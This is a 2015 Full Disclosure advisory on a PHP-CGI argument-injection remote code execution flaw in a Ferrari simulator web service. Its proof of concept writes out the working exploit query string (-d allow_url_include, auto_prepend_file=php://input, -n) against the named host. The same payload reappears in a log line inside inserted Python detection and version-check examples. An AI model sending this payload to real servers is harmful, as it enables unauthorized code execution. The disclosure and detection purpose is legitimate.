
[FD] Ferrari - PHP CGI Argument Injection (RCE) Vulnerability



Document Title:
===============
Ferrari - PHP CGI Argument Injection (RCE) Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1562

Video: http://www.vulnerability-lab.com/get_content.php?id=1561

Vulnerability Magazine: 
http://magazine.vulnerability-db.com/?q=articles/2015/08/07/ferraricom-simulationcenter-remote-code-execution-php-cgi-argument-injection


Release Date:
=============
2015-08-07


Vulnerability Laboratory ID (VL-ID):
====================================
1562


Common Vulnerability Scoring System:
====================================
9.2


Product & Service Introduction:
===============================
Users can choose from one of five different circuits (Monza, Imola, Mugello, 
Silverstone and Nürburgring), while HD screens literally wrap 
180 degrees around them, delivering ultra-realistic graphics to boot. The 
experience perfectly illustrates the concept of the new Ferrari Store, 
which was opened just two months ago and was conceived not merely as a shopping 
destination but also as an entertainment venue. 
With four F1 simulators, interactive video walls and numerous multisensory 
positions, the new 750 square meter space treats visitors to a 
completely immersive experience of the Ferrari legend. 

(Copy of the Vendor Homepage http://auto.ferrari.com/en_EN/news-events/ )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a remote code 
execution vulnerability in the official Ferrari online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-08-07:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ferrari
Product: Simulator - Online Service (Web-Application) 2015 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an 
argument injection vulnerability. This module takes advantage of 
the -d flag to set php.ini directives to achieve code execution. From the 
advisory: "if there is NO unescaped '=' in the query string, the string is 
split on '+' (encoded space) characters, urldecoded, passed to a function that 
escapes shell metacharacters (the 'encoded in a system-defined 
manner' from the RFC) and then passes them to the CGI binary." This module 
can also be used to exploit the Plesk 0day disclosed by kingcope and 
exploited in the wild in June 2013. (Source: 
http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection)
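The CGI rule quoted above (no unescaped "=" in the query string, split on "+", URL-decode, hand the pieces to the binary as arguments) is also exactly what a defender can key on in web-server logs, because a php-cgi switch such as -d or -n is never a legitimate CGI argument. The following is an added example, not code from the advisory or from the Rapid7 module: it reproduces the decoding rule and runs it over a few constructed Apache access-log lines (the addresses, timestamps and user agents are made up for the example).

```python
"""Detection of the php-cgi argument-injection request pattern in web logs.
Added example; it is not code from the advisory or from the Rapid7 module.
The log lines below are constructed for the example, not from a real server."""
import re
from urllib.parse import unquote

# php-cgi command-line switches that should never arrive as CGI arguments.
# -d and -n are the ones used in the advisory; -c (alternate php.ini path)
# and -s (print highlighted source) are further php-cgi switches.
PHP_CGI_SWITCHES = {"-d", "-n", "-c", "-s"}

# Apache combined-log request field: "METHOD target HTTP/x.y"
_REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines: one injection attempt, two benign requests.
LOG_LINES = [
    '198.51.100.7 - - [16/Jun/2015:09:16:13 +0000] "POST /cgi-bin/php?-d+allow_url_include%3Don'
    '+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 200 512 "-" "curl/7.38.0"',
    '198.51.100.8 - - [16/Jun/2015:09:17:02 +0000] "GET /cgi-bin/php?page=home HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/Jun/2015:09:18:40 +0000] "GET /book/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def cgi_argv_from_query(query):
    """Apply the CGI rule quoted in the advisory: a query string with no
    unescaped '=' is split on '+', URL-decoded and passed to the CGI binary
    as its argv. A query containing '=' is ordinary form data (returns [])."""
    if "=" in query:
        return []
    return [unquote(tok) for tok in query.split("+") if tok]


def php_cgi_switches(argv):
    """Return (switch, value) pairs for php-cgi switches present in argv.
    Handles both '-d directive=value' and the joined '-ddirective=value' form."""
    findings = []
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-d") and len(tok) > 2:       # joined form: -dfoo=bar
            findings.append(("-d", tok[2:]))
        elif tok == "-d" and i + 1 < len(argv):          # separated form
            findings.append(("-d", argv[i + 1]))
            i += 1
        elif tok in PHP_CGI_SWITCHES:
            findings.append((tok, ""))
        i += 1
    return findings


def scan_log(lines):
    """Return one record per log line whose query string would be handed to
    the CGI binary as argv and contains a php-cgi switch."""
    hits = []
    for line in lines:
        m = _REQUEST_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if "?" not in target:
            continue
        path, query = target.split("?", 1)
        argv = cgi_argv_from_query(query)
        findings = php_cgi_switches(argv)
        if findings:
            hits.append({"client": m.group("client"), "path": path,
                         "argv": argv, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit["client"], hit["path"], hit["findings"])
```

Only the first constructed line is reported: its query has no literal "=" (the "=" signs are percent-encoded, which is why the CGI layer treats it as argv), and after decoding it carries two -d directives and -n. The second line is normal form data and the third has no query at all. The same two conditions (query without "=", query containing "-") are what the mod_rewrite workaround published alongside the PHP 5.3.12/5.4.2 release keyed on; upgrading PHP, or not running php-cgi through mod_cgi at all, remains the actual fix.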


Proof of Concept (PoC):
=======================
The remote code execution vulnerability can be exploited by remote attackers 
without a privileged application user account or user interaction.
For security demonstration or to reproduce, follow the provided information and 
steps below.

How I found the vulnerability: As part of any penetration test, fingerprinting 
is one of the first steps.
After sending a request to their servers, I noticed they used PHP/5.3.12, which 
is known to be vulnerable to a command execution vulnerability.

The Response: 
HTTP/1.1 302 Found
Date: Wed, 16 Jun 2015 09:16:13 GMT
Server: Apache
Location: /book/
X-Powered-By: PHP/5.3.12
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
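The X-Powered-By header in that response is what gave the version away, and the same header is the cheapest inventory check a defender has. The following is an added example, not code from the advisory: it parses a raw response head (reconstructed from the headers shown above) and flags a PHP version inside the range the advisory names as affected, "up to 5.3.12 and 5.4.2". The cut-off per branch is an assumption drawn from that wording; branches older than 5.3 are treated as affected and 5.5 and later as not listed.

```python
"""Flag an HTTP response that advertises a PHP version in the range the
advisory names as affected. Added example, not code from the advisory; the
raw response below is reconstructed from the headers printed in the advisory."""
import re

# "Up to 5.3.12 and 5.4.2" per the advisory. Assumption: later patch releases
# of those branches are fixed and 5.5+ is outside the affected range.
AFFECTED_CEILING = {(5, 3): (5, 3, 12), (5, 4): (5, 4, 2)}

# Constructed from the response shown in the advisory.
RAW_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Date: Wed, 16 Jun 2015 09:16:13 GMT\r\n"
    "Server: Apache\r\n"
    "Location: /book/\r\n"
    "X-Powered-By: PHP/5.3.12\r\n"
    "Vary: Accept-Encoding\r\n"
    "Content-Length: 0\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)


def parse_headers(raw):
    """Split a raw HTTP response head into (status_line, {lower-name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def php_version(headers):
    """Return the PHP version announced in X-Powered-By as a tuple, or None.
    expose_php=Off suppresses the header, so None means unknown, not safe."""
    value = headers.get("x-powered-by", "")
    m = re.search(r"PHP/(\d+)\.(\d+)\.(\d+)", value)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected_version(version):
    """True if the version lies within the affected range for its branch."""
    branch = version[:2]
    if branch in AFFECTED_CEILING:
        return version <= AFFECTED_CEILING[branch]
    return branch < (5, 3)   # older branches never received the fix


def assess(raw):
    """Summarise one response: status, server banner, PHP version, verdict."""
    status, headers = parse_headers(raw)
    version = php_version(headers)
    return {
        "status": status,
        "server": headers.get("server"),
        "version": version,
        "affected": None if version is None else is_affected_version(version),
    }


if __name__ == "__main__":
    print(assess(RAW_RESPONSE))
```

Two caveats for anyone using this in an inventory scan: a version string is only a hint (a backported distribution patch keeps the old number), and setting expose_php = Off in php.ini removes the header without removing the bug, so a missing header must be recorded as "unknown", which is why assess() returns None rather than False in that case.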

I started testing for this vulnerability manually and noticed code execution 
could be performed. When making a POST request to:

http://simulationcenter.ferrari.com/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n

I noticed an error.
http://i.imgur.com/lFPgpyn.png

When sending some PHP script along with the POST request I noticed the script 
was executed. I sent this script: <?php echo(md5(kieran)); ?> and the right 
hash was returned.

I then did some automated testing with a Metasploit script, and this also gave 
positive results.

The exploit script can be found here: 
http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection

The PoC with both manual and automated exploitation can be found here: 
https://www.youtube.com/watch?v=vv7SMWC08eI


Solution - Fix & Patch:
=======================
2015-08-05 (fixed by Ferrari)


Security Risk:
==============
The security risk of the code execution web vulnerability in the Ferrari simulator 
online service is estimated as critical. (CVSS 9.2)


Credits & Authors:
==================
Kieran Claessens (www.kieranclaessens.be)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx - research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usage, of this file 
requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All 
other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website 
are trademarks of the Vulnerability-Lab team and the specific authors or managers. To 
record, list (feed), modify, use or edit our material, contact 
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get 
permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
PGP KEY: 
http://www.vulnerability-lab.com/keys/admin@xxxxxxxxxxxxxxxxxxxxx%280x198E9928%29.txt



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/